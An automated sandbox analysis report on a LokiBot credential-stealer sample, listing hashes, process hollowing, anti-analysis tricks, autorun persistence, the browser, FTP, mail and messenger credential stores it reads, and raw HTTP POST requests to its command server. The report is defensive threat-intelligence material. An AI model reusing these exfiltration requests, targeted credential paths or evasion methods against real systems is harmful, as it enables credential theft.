Sep 04, 2019, 12:56 AM
1
2* ID: 888
3* MalFamily: "Loki"
4
5* MalScore: 10.0
6
7* File Name: "Loki_a3b2bcb88650a5852ca8a0485391ce42.1"
8* File Size: 925696
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "af04fe80f80a0b0495958377aa099019d46890dd5fc79a5ea33c87ece98e90cd"
11* MD5: "a3b2bcb88650a5852ca8a0485391ce42"
12* SHA1: "305af5c09f5a3add010e1ee82250d24d310d630c"
13* SHA512: "d6222fa1bb03acd96c2e1cc2b7c6e2ef7749bcdd43ff038e7b429c42a14010adc1a25f78ef643e8e3aa942d9bfe5b318770ab76c756a52ef997a8127c7d88598"
14* CRC32: "CDF8A7A3"
15* SSDEEP: "1536:xOXjYijDzy0bBZI3uMaDvBj5QIZv/uyrszBBYb4VCCVVUjMQvEq2cAGMOyn6gCDp:I3og55QKv9b4PoLvh2cQ27eruRYK"
16
17* Process Execution:
18 "nGo8VQ9y.exe",
19 "wscript.exe",
20 "filename.exe",
21 "filename.exe",
22 "explorer.exe",
23 "services.exe",
24 "lsass.exe",
25 "WmiApSrv.exe",
26 "svchost.exe",
27 "WmiPrvSE.exe"
28
29
30* Executed Commands:
31 "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\"",
32 "C:\\Users\\user\\subfolder\\filename.vbs ",
33 "\"C:\\Users\\user\\subfolder\\filename.exe\"",
34 "C:\\Users\\user\\subfolder\\filename.exe ",
35 "C:\\Windows\\system32\\lsass.exe",
36 "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
37 "C:\\Windows\\system32\\svchost.exe -k netsvcs"
38
39
40* Signatures Detected:
41
42 "Description": "Behavioural detection: Executable code extraction",
43 "Details":
44
45
46 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
47 "Details":
48
49
50 "Description": "Possible date expiration check, exits too soon after checking local time",
51 "Details":
52
53 "process": "nGo8VQ9y.exe, PID 2432"
54
55
56
57
58 "Description": "Guard pages use detected - possible anti-debugging.",
59 "Details":
60
61
62 "Description": "Detected script timer window indicative of sleep style evasion",
63 "Details":
64
65 "Window": "WSH-Timer"
66
67
68
69
70 "Description": "A process attempted to delay the analysis task.",
71 "Details":
72
73 "Process": "filename.exe tried to sleep 904 seconds, actually delayed analysis time by 0 seconds"
74
75
76
77
78 "Description": "Reads data out of its own binary image",
79 "Details":
80
81 "self_read": "process: nGo8VQ9y.exe, pid: 2432, offset: 0x00000000, length: 0x000e2000"
82
83
84 "self_read": "process: wscript.exe, pid: 2680, offset: 0x00000000, length: 0x00000040"
85
86
87 "self_read": "process: wscript.exe, pid: 2680, offset: 0x000000f0, length: 0x00000018"
88
89
90 "self_read": "process: wscript.exe, pid: 2680, offset: 0x000001e8, length: 0x00000078"
91
92
93 "self_read": "process: wscript.exe, pid: 2680, offset: 0x00018000, length: 0x00000020"
94
95
96 "self_read": "process: wscript.exe, pid: 2680, offset: 0x00018058, length: 0x00000018"
97
98
99 "self_read": "process: wscript.exe, pid: 2680, offset: 0x000181a8, length: 0x00000018"
100
101
102 "self_read": "process: wscript.exe, pid: 2680, offset: 0x00018470, length: 0x00000010"
103
104
105 "self_read": "process: wscript.exe, pid: 2680, offset: 0x00018640, length: 0x00000012"
106
107
108
109
110 "Description": "A process created a hidden window",
111 "Details":
112
113 "Process": "nGo8VQ9y.exe -> C:\\Users\\user\\subfolder\\filename.vbs"
114
115
116 "Process": "nGo8VQ9y.exe -> C:\\Users\\user\\subfolder\\filename.exe"
117
118
119
120
121 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
122 "Details":
123
124 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
125
126
127 "http_version_old": "HTTP traffic uses version 1.0"
128
129
130 "suspicious_request_iocs": "http://jiraiya.info/joe23/five/fre.php"
131
132
133
134
135 "Description": "Performs some HTTP requests",
136 "Details":
137
138 "url_iocs": "http://jiraiya.info/joe23/five/fre.php"
139
140
141
142
143 "Description": "A scripting utility was executed",
144 "Details":
145
146 "command": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\""
147
148
149
150
151 "Description": "Behavioural detection: Injection (Process Hollowing)",
152 "Details":
153
154 "Injection": "filename.exe(788) -> filename.exe(2468)"
155
156
157
158
159 "Description": "Executed a process and injected code into it, probably while unpacking",
160 "Details":
161
162 "Injection": "filename.exe(788) -> filename.exe(2468)"
163
164
165
166
167 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
168 "Details":
169
170 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 136624 times"
171
172
173
174
175 "Description": "Steals private information from local Internet browsers",
176 "Details":
177
178 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
179
180
181
182
183 "Description": "Installs itself for autorun at Windows startup",
184 "Details":
185
186 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name"
187
188
189 "data": "C:\\Users\\user\\subfolder\\filename.vbs -cz"
190
191
192
193
194 "Description": "Creates a hidden or system file",
195 "Details":
196
197 "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
198
199
200 "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
201
202
203
204
205 "Description": "CAPE detected the Loki malware family",
206 "Details":
207
208
209 "Description": "File has been identified by 17 Antiviruses on VirusTotal as malicious",
210 "Details":
211
212 "Malwarebytes": "Trojan.MalPack.VB.Generic"
213
214
215 "Invincea": "heuristic"
216
217
218 "F-Prot": "W32/VBKrypt.ZA.gen!Eldorado"
219
220
221 "Symantec": "ML.Attribute.HighConfidence"
222
223
224 "APEX": "Malicious"
225
226
227 "Paloalto": "generic.ml"
228
229
230 "Sophos": "Mal/FareitVB-N"
231
232
233 "FireEye": "Generic.mg.a3b2bcb88650a585"
234
235
236 "SentinelOne": "DFI - Suspicious PE"
237
238
239 "Cyren": "W32/VBKrypt.ZA.gen!Eldorado"
240
241
242 "Microsoft": "Trojan:Win32/Wacatac.B!ml"
243
244
245 "Endgame": "malicious (high confidence)"
246
247
248 "Acronis": "suspicious"
249
250
251 "Cylance": "Unsafe"
252
253
254 "ESET-NOD32": "a variant of Win32/Injector.EHNM"
255
256
257 "Fortinet": "W32/Injector.EHNM!tr"
258
259
260 "CrowdStrike": "win/malicious_confidence_70% (W)"
261
262
263
264
265 "Description": "Creates a copy of itself",
266 "Details":
267
268 "copy": "C:\\Users\\user\\subfolder\\filename.exe"
269
270
271 "copy": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
272
273
274
275
276 "Description": "Drops a binary and executes it",
277 "Details":
278
279 "binary": "C:\\Users\\user\\subfolder\\filename.exe"
280
281
282
283
284 "Description": "Harvests credentials from local FTP client softwares",
285 "Details":
286
287 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
288
289
290 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
291
292
293 "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
294
295
296 "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
297
298
299 "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
300
301
302 "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
303
304
305 "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
306
307
308 "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
309
310
311 "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
312
313
314 "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
315
316
317
318
319 "Description": "Harvests information related to installed instant messenger clients",
320 "Details":
321
322 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
323
324
325
326
327 "Description": "Harvests information related to installed mail clients",
328 "Details":
329
330 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
331
332
333 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
334
335
336 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
337
338
339 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
340
341
342 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
343
344
345 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
346
347
348 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
349
350
351 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
352
353
354 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
355
356
357 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
358
359
360 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
361
362
363 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
364
365
366 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
367
368
369 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
370
371
372 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
373
374
375 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
376
377
378 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
379
380
381 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
382
383
384 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
385
386
387 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
388
389
390 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
391
392
393 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
394
395
396 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
397
398
399 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
400
401
402 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
403
404
405 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
406
407
408 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
409
410
411 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
412
413
414 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
415
416
417 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
418
419
420 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
421
422
423 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
424
425
426 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
427
428
429 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
430
431
432 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
433
434
435
436
437 "Description": "Created network traffic indicative of malicious activity",
438 "Details":
439
440 "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
441
442
443 "signature": "ET TROJAN LokiBot Fake 404 Response"
444
445
446 "signature": "ET TROJAN LokiBot Checkin"
447
448
449 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
450
451
452 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
453
454
455 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
456
457
458 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
459
460
461
462
463
464* Started Service:
465 "VaultSvc",
466 "wmiApSrv"
467
468
469* Mutexes:
470 "Local\\ZoneAttributeCacheCounterMutex",
471 "Local\\ZonesCacheCounterMutex",
472 "Local\\ZonesLockedCacheCounterMutex",
473 "6EFA73A4746045B65DEE781E",
474 "Global\\RefreshRA_Mutex_Lib",
475 "Global\\RefreshRA_Mutex",
476 "Global\\RefreshRA_Mutex_Flag",
477 "Global\\WmiApSrv"
478
479
480* Modified Files:
481 "C:\\Users\\user\\subfolder\\filename.exe",
482 "C:\\Users\\user\\subfolder\\filename.vbs",
483 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
484 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe",
485 "\\??\\WMIDataDevice",
486 "\\??\\PIPE\\samr",
487 "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
488 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
489 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
490 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
491 "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
492 "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
493 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
494 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER"
495
496
497* Deleted Files:
498 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
499 "C:\\Users\\user\\subfolder\\filename.exe"
500
501
502* Modified Registry Keys:
503 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
504 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
505 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name",
506 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
507 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
508 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed",
509 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
510 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
511 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
512 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
513 "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
514 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
515 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
516 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
517 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
518 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
519 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider"
520
521
522* Deleted Registry Keys:
523 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
524 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
525 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
526 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
527
528
529* DNS Communications:
530
531 "type": "A",
532 "request": "jiraiya.info",
533 "answers":
534
535 "data": "47.88.102.244",
536 "type": "A"
537
538
539
540
541
542* Domains:
543
544 "ip": "47.88.102.244",
545 "domain": "jiraiya.info"
546
547
548
549* Network Communication - ICMP:
550
551* Network Communication - HTTP:
552
553 "count": 2,
554 "body": "",
555 "uri": "http://jiraiya.info/joe23/five/fre.php",
556 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
557 "method": "POST",
558 "host": "jiraiya.info",
559 "version": "1.0",
560 "path": "/joe23/five/fre.php",
561 "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
562 "port": 80
563
564
565 "count": 16,
566 "body": "",
567 "uri": "http://jiraiya.info/joe23/five/fre.php",
568 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
569 "method": "POST",
570 "host": "jiraiya.info",
571 "version": "1.0",
572 "path": "/joe23/five/fre.php",
573 "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
574 "port": 80
575
576
577
578* Network Communication - SMTP:
579
580* Network Communication - Hosts:
581
582 "country_name": "United States",
583 "ip": "47.88.102.244",
584 "inaddrarpa": "",
585 "hostname": "jiraiya.info"
586
587
588
589* Network Communication - IRC: